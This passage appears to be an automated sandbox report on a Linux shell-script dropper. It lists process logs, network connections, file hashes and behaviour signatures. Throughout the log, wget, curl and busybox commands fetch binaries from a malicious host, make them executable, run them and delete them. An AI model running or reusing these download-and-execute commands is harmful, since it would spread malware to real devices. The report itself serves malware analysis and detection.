[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 01:50

Reported

2024-10-18 01:52

Platform

debian9-mipsel-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A

Processes

/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

